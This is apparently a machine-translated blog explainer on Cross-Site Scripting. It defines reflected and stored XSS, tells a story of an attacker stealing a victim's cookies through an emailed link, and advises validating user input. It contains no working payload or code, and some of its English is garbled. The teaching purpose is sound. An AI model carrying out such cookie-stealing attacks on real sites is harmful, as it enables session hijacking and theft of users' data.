what is xss and how does it work
Cross-Site Scripting XSS is a type of code injection attack (code injection attack). XSS is carried out by an attacker with how to enter the HTML code or the client script code into a site. This attack will be as if it came from such a site. Due to this attack, among others, the attacker can bypass the security on the client-side, obtain sensitive information, or save the application is harmful.
Why Cross-Site Scripting abbreviated as XSS instead of CSS? Because the Abbreviation of CSS is already used to cascade style sheets.
Confused script XSS like what? please see HERE.
- Reflected XSS
Reflected XSS is a type of XSS that is the most common and the most easily done by the attacker. Attackers use social engineering to link with malicious code is clicked by the user. This way the attacker can get the user's cookie that can be used subsequent to hijack the session of the user.
The mechanism of defence against this attack is to perform validation of input before displaying any data generated by the user. Do not trust any data sent by the user.
Examples of assault using XSS (Name – name that I use is the bouquet) :
- 1. Toni often visits the website of jack, who in such websites allow Toni to enter username/password and store personal data or transaction data that should not be known to others.
- 2. Rey knew that Toni often visit that web, and then observe if the website artificial Jack there is a vulnerability or gap that can be attacked using XSS
- 3. Rey is then given a warm welcome and try to find the cracks and make malicious scripts and then embed or inserted into a URL
- 4. Rey then sends an email to Toni that contains a link to a web page jack actually the URL is already in the embed malicious scripts, as well as seduce him by reason of the false or the like.
- 5. when Toni click the URL then Toni will be entered into the website of jack as well as the scripts that are already Rey made will run, so Rey could take the data from cookies and can use them.
2. Stored XSS
Stored XSS is rarely encountered and the impact of the attack is large. An attack stored XSS can result in all users. Stored XSS occurs when a user is allowed to enter data that will be displayed again. An example is on the message board, guest book, etc. The attackers enter the HTML code or the client script code other on their posts.
The only article about understanding XSS hopefully there can understand easily and don't forget to comment below.